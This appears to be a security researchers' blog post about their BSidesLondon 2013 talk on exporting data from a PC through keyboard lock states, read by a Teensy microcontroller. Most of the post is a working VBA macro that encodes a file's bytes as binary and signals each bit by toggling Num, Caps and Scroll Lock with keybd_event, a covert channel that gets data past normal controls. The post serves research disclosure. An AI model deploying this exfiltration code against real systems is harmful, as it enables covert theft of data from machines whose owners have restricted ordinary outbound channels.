Blinking Hell – Export Data Using A Keyboard
For those that can’t be bothered to read this post and just want the code, please see here.
So myself and Rich Hicks finally got around to talking about the work we had done with the Teensy. An ATMega, USB-based Microcontroller sold by
I started work on this back in 2011 but didn’t take it any further until Rich came on board towards the end of 2011. We got some sample proof of concept code working but didn’t do anything further with it.
We then heard that at BSidesLondon 2013 they were starting a Rookie Track. For those that don’t know this was an opportunity for people who had never gave any talks before a chance to get up in front of a small crowd and test their bravery! Here are our slides.
Here’s is a Demo of the attack in action.
What our talk was about is using the teensy to capture the state of the keyboard lock states such as the Caps, Scroll and Num locks. The ability to capture these states allows the ability to export data by toggling these states.
We used a Visual Basic for applications to export a binary stream using the keyboard states.
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End If toSendLength = Len(h2b(toSendHex)) Debug.Print "Len:"; toSendLength; "BYTE:"; tByte; "Hex:"; Hex(tByte); " SendHex:"; toSendHex; " Bin:"; h2b(Hex(tByte)); " SendBin:"; h2b(toSendHex) Do Until PosInSendString = toSendLength + 1 If CapsLockOn = True Then 'PC has control Sleep (150) char_val = Mid(h2b(toSendHex), PosInSendString, 1) ' Convert to binary. If char_val = "0" Then Call NumOff_Click ' send 0 ElseIf char_val = "1" Then Call NumOn_Click ' send 1 Else Debug.Print "Something Broke Here" End If Let PosInSendString = PosInSendString + 1 ' add 1 to value of PosInSendString Call CapsOff_Click ' turn caps lock off - relinquish control Call ScrollOn_Click ' turn scroll lock on - give teensy control. End If DoEvents ' Stops it hanging. Loop Let PosInSendString = 1 Next 'For Each tByte In btAR 'toSendHex = Hex(tByte) 'Clear current status of togglekeys 'If (Hex(tByte) = 0) Then toSendHex = "FF" ' Hack to get around limitations of unquoted strings in VB. 00 gets shortened to 0 and corrupts files. 'End If toSendLength = Len(h2b(toSendHex)) Debug.Print "Len:"; toSendLength; "BYTE:"; tByte; "Hex:"; Hex(tByte); " SendHex:"; toSendHex; " Bin:"; h2b(Hex(tByte)); " SendBin:"; h2b(toSendHex) Do Until PosInSendString = toSendLength + 1 If CapsLockOn = True Then 'PC has control Sleep (150) char_val = Mid(h2b(toSendHex), PosInSendString, 1) ' Convert to binary. If char_val = "0" Then Call NumOff_Click ' send 0 ElseIf char_val = "1" Then Call NumOn_Click ' send 1 Else Debug.Print "Something Broke Here" End If Let PosInSendString = PosInSendString + 1 ' add 1 to value of PosInSendString Call CapsOff_Click ' turn caps lock off - relinquish control Call ScrollOn_Click ' turn scroll lock on - give teensy control. End If DoEvents ' Stops it hanging. Loop Let PosInSendString = 1 'Next ' Convert bytes to string Str = StrConv(btAR, vbUnicode) Debug.Print "'" & Str & "'" Debug.Print "###### End ######" Call AllOff ' set all off End Sub Function CapsLockOn() As Boolean Dim x As Integer x = GetKeyState(&H14) CapsLockOn = (x = 1 Or x = -127) End Function Function NumLockOn() As Boolean Dim x As Integer x = GetKeyState(&H90) NumLockOn = (x = 1 Or x = -127) End Function Function ScrollLockOn() As Boolean Dim x As Integer x = GetKeyState(&H91) ScrollLockOn = (x = 1 Or x = -127) End Function Private Sub NumOn_Click() If NumLockOn = False Then 'If it's off then turn on, else do nothing keybd_event &H90, &H45, &H1 Or 0, 0 keybd_event &H90, &H45, &H1 Or &H2, 0 End If End Sub Private Sub NumOff_Click() If NumLockOn = True Then 'If it's on then turn off, else do nothing keybd_event &H90, &H45, &H1 Or 0, 0 keybd_event &H90, &H45, &H1 Or &H2, 0 End If End Sub Private Sub CapsOn_Click() If CapsLockOn = False Then 'If it's off then turn on, else do nothing keybd_event &H14, &H45, &H1 Or 0, 0 keybd_event &H14, &H45, &H1 Or &H2, 0 End If End Sub Private Sub CapsOff_Click() If CapsLockOn = True Then 'If it's on then turn off, else do nothing keybd_event &H14, &H45, &H1 Or 0, 0 keybd_event &H14, &H45, &H1 Or &H2, 0 End If End Sub Private Sub ScrollOn_Click() If ScrollLockOn = False Then 'If it's off then turn on, else do nothing keybd_event &H91, &H45, &H1 Or 0, 0 keybd_event &H91, &H45, &H1 Or &H2, 0 End If End Sub Private Sub ScrollOff_Click() If ScrollLockOn = True Then 'If it's on then turn off, else do nothing keybd_event &H91, &H45, &H1 Or 0, 0 keybd_event &H91, &H45, &H1 Or &H2, 0 End If End Sub Function AllOff() As Boolean Call NumOff_Click Call CapsOff_Click Call ScrollOff_Click End Function Function h2b(hstr) 'convert hex string to binary string cnvarr = Array("0000", "0001", "0010", "0011", _ "0100", "0101", "0110", "0111", "1000", _ "1001", "1010", "1011", "1100", "1101", _ "1110", "1111") bstr = "" For i = 1 To Len(hstr) hdgt = Mid(hstr, i, 1) cix = CInt("&H" & hdgt) bstr = bstr & cnvarr(cix) Next h2b = bstr End Function |
and we used the following code on the teensy to capture the data:
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And this is how the data flows.
UPDATE: Finally we’ve managed to get a Picture in Picture put together.
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